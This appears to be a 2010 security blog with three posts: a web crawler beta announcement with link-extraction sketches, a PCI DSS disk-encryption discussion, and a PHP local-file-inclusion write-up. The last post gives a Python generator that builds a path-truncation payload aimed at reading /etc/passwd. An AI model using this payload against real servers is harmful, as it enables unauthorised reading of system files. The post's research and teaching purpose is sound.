Friday, August 20, 2010

Web Crawler Beta Released!

Web Crawler - first public beta release is out!

Crawler is a utility designed to test and demonstrate the features of the WebEngine open-source library. The program gathers information about the resources of a specified web server by analyzing references in the HTML markup, text, and JavaScript code. Additionally, a query is sent to the Web of Trust knowledge base to obtain information about the analyzed site. This check demonstrates how web application vulnerabilities can be analyzed.
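To illustrate the first step of reference gathering, here is a minimal sketch of extracting links from HTML markup. This is not the WebEngine library's implementation — just a toy example using Python's standard `html.parser`, with a made-up sample page:

```python
# Minimal illustration of gathering references from HTML markup.
# NOT the WebEngine implementation -- just a sketch of the idea.
from html.parser import HTMLParser

class LinkExtractor(HTMLParser):
    """Collects href/src references from HTML start tags."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.links.append(value)

page = '<html><body><a href="/about.html">About</a><img src="/logo.png"></body></html>'
extractor = LinkExtractor()
extractor.feed(page)
print(extractor.links)  # ['/about.html', '/logo.png']
```

A real crawler would additionally resolve relative references against the page URL and extract references from text and JavaScript, which this sketch does not attempt.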
First and foremost, please do not be evil. Use Crawler only against services you own or have permission to test. This application is not a full-fledged web application security analyzer.

Furthermore, the library is currently not intended for scanning rogue or misbehaving HTTP servers; in such cases, correct and stable operation cannot be guaranteed.
The main features provided by the application are listed below:
  • JavaScript analysis that extracts references by simulating a DOM structure
  • Support for the Basic, Digest, and NTLM authentication schemes
  • Access to the contents of web servers via HTTP
  • Operation through proxy servers with various authentication schemes
  • A wide variety of options to describe the scan target (lists of scanned domains; restriction of scanning to a host, a domain, or a web server directory; etc.)
  • A modular structure that allows plug-ins to be implemented
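The scan-target restriction mentioned above can be sketched as a simple scope check. The function name and rules below are assumptions for illustration, not the crawler's actual options:

```python
# Hedged sketch of a scan-scope filter (restrict scanning to a host and a
# directory). Names and semantics here are illustrative assumptions only.
from urllib.parse import urlparse

def in_scope(url, allowed_host, base_path="/"):
    """Accept a URL only if it targets the allowed host and stays under base_path."""
    parts = urlparse(url)
    return parts.hostname == allowed_host and parts.path.startswith(base_path)

print(in_scope("http://example.com/docs/index.html", "example.com", "/docs/"))  # True
print(in_scope("http://evil.example.org/docs/", "example.com", "/docs/"))       # False
print(in_scope("http://example.com/admin/", "example.com", "/docs/"))           # False
```

A production scanner would also normalize the path (to defeat `../` tricks) and compare hostnames case-insensitively before applying such a filter.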

Web Crawler GUI - Scan Results Example

Web Crawler GUI - Profiles, Plugins

Friday, August 6, 2010

PCI DSS and Red Hat Enterprise Linux (Part #3)

Author: Feodor Kulishov

[Part #1] [Part #2]


Requirement 3: Protect stored cardholder data

3.4.1.a If disk encryption is used, logical access must be managed independently of native operating system access control mechanisms

The essence of this requirement is that access to decrypted data should be allowed only to those who know the key; thus, processes and users (even system administrators) cannot correctly read or modify such data unless they have the decryption key.

For all widespread Linux file system encryption mechanisms (cryptsetup, cryptsetup + LUKS, EncFS, eCryptFS), the decrypted file system (FS) is logically identical to an ordinary one and has the same access attributes, ACLs, etc. In this way, the transparency property of the file system is preserved. However, even if the data access rights are specified correctly, root and any processes with UID=0 are able to access the data once it has been decrypted by the key owner; this means that the given PCI DSS requirement is not fulfilled by any of these Linux file system encryption mechanisms.
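The reason root defeats this control can be shown with a toy model of the POSIX permission check: for UID 0 the mode bits are simply ignored (via CAP_DAC_OVERRIDE). This is an illustrative simplification, not kernel code:

```python
# Toy model of why UID 0 defeats FS-level access control on a transparently
# decrypted file system: the permission check grants root everything,
# regardless of mode bits. Illustration only, not actual kernel logic.
def may_read(uid, file_owner_uid, mode):
    if uid == 0:                     # root / CAP_DAC_OVERRIDE: mode bits ignored
        return True
    if uid == file_owner_uid:        # owner: check the user read bit
        return bool(mode & 0o400)
    return bool(mode & 0o004)        # others: check the world read bit

print(may_read(0, 1000, 0o600))     # True  -- root reads anyone's decrypted file
print(may_read(1001, 1000, 0o600))  # False -- another user is denied
```

In other words, once the key owner has mounted the decrypted FS, its protection degrades to ordinary OS access control, which is exactly what requirement 3.4.1.a forbids relying on.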

Thursday, August 5, 2010

Another alternative to the NULL byte

Undoubtedly, many of you remember that Raz0r raised the question of alternatives to the NULL byte about a year ago, and the ush team conducted corresponding research into this problem [1, 2, and 3]. Incidentally, yours truly added a new method to the MaxPatrol knowledge base at the same time and supplemented the method's implementation with my own elaborations [4].

So why return to this topic? The point is that the method mentioned above was based on the idea of zapping the end of the file name (its extension), which would otherwise get into the include. This is possible because PHP normalizes paths and fails to access a file whose path exceeds MAX_PATH. Well, why not use the same PHP restriction (the MAX_PATH value) and try to fill out the length of the file name from the beginning instead? This idea occurred to a young man (Yuri Goltsev) who was asked a relevant question at a job interview. And indeed, it must work!
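The padding idea can be sketched as a payload generator: prepend enough self-referencing `./` segments that the full path, together with whatever suffix the vulnerable script appends (e.g. `.php`), exceeds MAX_PATH and gets truncated. Everything here is an assumption for illustration — the 4096 limit stands in for the target's actual MAX_PATH, and the target file is just an example:

```python
# Illustrative payload construction for the MAX_PATH truncation idea.
# 4096 is an assumed stand-in for the target's MAX_PATH; verify it for the
# actual platform and PHP build before drawing conclusions.
MAX_PATH = 4096

def build_payload(target_file):
    # Pad from the BEGINNING with "./" segments (no-ops under path
    # normalization) so that the path plus any appended suffix exceeds
    # MAX_PATH, causing the suffix to be cut off.
    payload = target_file
    while len(payload) < MAX_PATH:
        payload = "./" + payload
    return payload

p = build_payload("../../../../etc/passwd")
print(len(p) >= 4096)            # True
print(p.endswith("/etc/passwd")) # True
```

Whether truncation actually drops the appended extension depends on the PHP version and platform, so a sketch like this would need to be tested against the specific environment.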